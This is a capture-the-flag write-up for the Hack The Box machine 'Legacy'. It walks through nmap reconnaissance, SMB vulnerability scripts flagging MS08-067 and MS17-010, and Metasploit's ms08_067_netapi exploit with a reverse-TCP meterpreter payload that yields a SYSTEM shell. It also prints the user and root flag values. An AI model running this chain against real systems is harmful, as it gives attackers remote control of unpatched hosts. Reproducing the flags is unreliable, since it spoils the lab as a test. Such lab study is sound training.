Legacy
Legacy is a Windows XP machine exposing a critically vulnerable SMB service. Legacy runs Windows XP and is vulnerable to two separate SMB CVEs simultaneously - MS08-067 and MS17-010. The attack uses MS08-067, a stack buffer overflow in the Windows Server service triggered via a crafted RPC request, landing a SYSTEM shell with zero post-exploitation steps required.
Legacy
MS08-067, Windows XP
Attack Chain
1
2
3
4
5
6
7
Nmap → Port 445 open (Windows XP SP3)
→ smb-vuln scripts confirm MS08-067 + MS17-010
→ MSF ms08_067_netapi
→ Stack overflow via crafted RPC/SMB path
→ NT AUTHORITY\SYSTEM shell
→ user.txt (Documents and Settings\john\Desktop)
→ root.txt (Documents and Settings\Administrator\Desktop)
Reconnaissance
Full port scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Nmap scan report for 10.129.227.181
Host is up, received echo-reply ttl 127 (0.16s latency).
Scanned at 2026-06-12 14:05:18 EAT for 978s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: a2:de:ad:ef:a6:51 (unknown)
| Names:
| LEGACY<00> Flags: <unique><active>
| LEGACY<20> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| a2 de ad ef a6 51 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 16915/tcp): CLEAN (Couldn't connect)
| Check 2 (port 14160/tcp): CLEAN (Couldn't connect)
| Check 3 (port 60321/udp): CLEAN (Failed to receive data)
| Check 4 (port 27086/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2026-06-17T16:19:07+03:00
|_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
NSE: Script Post-scanning.
Windows XP + port 445 is an immediate red flag. Run vulnerability scripts:
Two critical CVEs identified:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
➜ nmap -p 445 --script vuln 10.129.227.181 -vv
Nmap scan report for 10.129.227.181
Host is up, received echo-reply ttl 127 (0.16s latency).
Scanned at 2026-06-12 14:19:54 EAT for 15s
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 127
Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
This machine is nearly a decade past end-of-life and carrying every major SMB exploit. I used MS08-067 as it’s the historically appropriate exploit for XP SP3.
Exploitation - MS08-067 NetAPI
Search for the module and load it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
➜ msfconsole -q
msf > search CVE-2008-4250
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
//// REDACTED ////
msf > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.118 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
Configure ,verify and run the exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf exploit(windows/smb/ms08_067_netapi) > setg RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf exploit(windows/smb/ms08_067_netapi) > setg LHOST tun0
LHOST => tun0
msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.129.227.181:445 - The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.15.192:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.26/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (199238 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.15.192:4444 -> 10.129.227.181:1040) at 2026-06-12 14:28:20 +0300
meterpreter >
The module auto-detects the target OS and selects the correct exploit variant. The overflow corrupts the stack during SMB path canonicalization, redirecting execution into the payload.
Confirm access:
1
2
3
4
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
I landed directly as SYSTEM - no privilege escalation required.
Proceed to grab the flags as shown:
Windows XP uses
Documents and Settingsinstead ofUsers
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
meterpreter > pwd
C:\
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 08:30:44 +0300 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 08:30:44 +0300 CONFIG.SYS
040777/rwxrwxrwx 0 dir 2017-03-16 09:07:20 +0300 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 08:30:44 +0300 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 08:30:44 +0300 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 23:13:04 +0300 NTDETECT.COM
040555/r-xr-xr-x 0 dir 2017-12-29 23:41:18 +0300 Program Files
040777/rwxrwxrwx 0 dir 2017-03-16 08:32:59 +0300 System Volume Information
040777/rwxrwxrwx 0 dir 2022-05-18 15:10:06 +0300 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 08:26:58 +0300 boot.ini
100444/r--r--r-- 250048 fil 2008-04-14 01:01:44 +0300 ntldr
000000/--------- 0 fif 1970-01-01 03:00:00 +0300 pagefile.sys
meterpreter > cd Documents\ and\ Settings\\
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-03-16 09:07:21 +0300 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 08:29:48 +0300 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 08:33:37 +0300 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 08:32:52 +0300 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 08:32:43 +0300 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 08:33:42 +0300 john
meterpreter > ls john\\Desktop\\
Listing: john\Desktop\
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 09:19:49 +0300 user.txt
meterpreter > cat john\\Desktop\\user.txt
e69af0e4f443de7e36876fda4ec7644fmeterpreter >
meterpreter > ls Administrator\\Desktop\\
Listing: Administrator\Desktop\
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 09:18:50 +0300 root.txt
meterpreter > cat Administrator\\Desktop\\root.txt
993442d258b0e0ec917cae9e695d5713meterpreter >
This post is licensed under CC BY 4.0 by the author.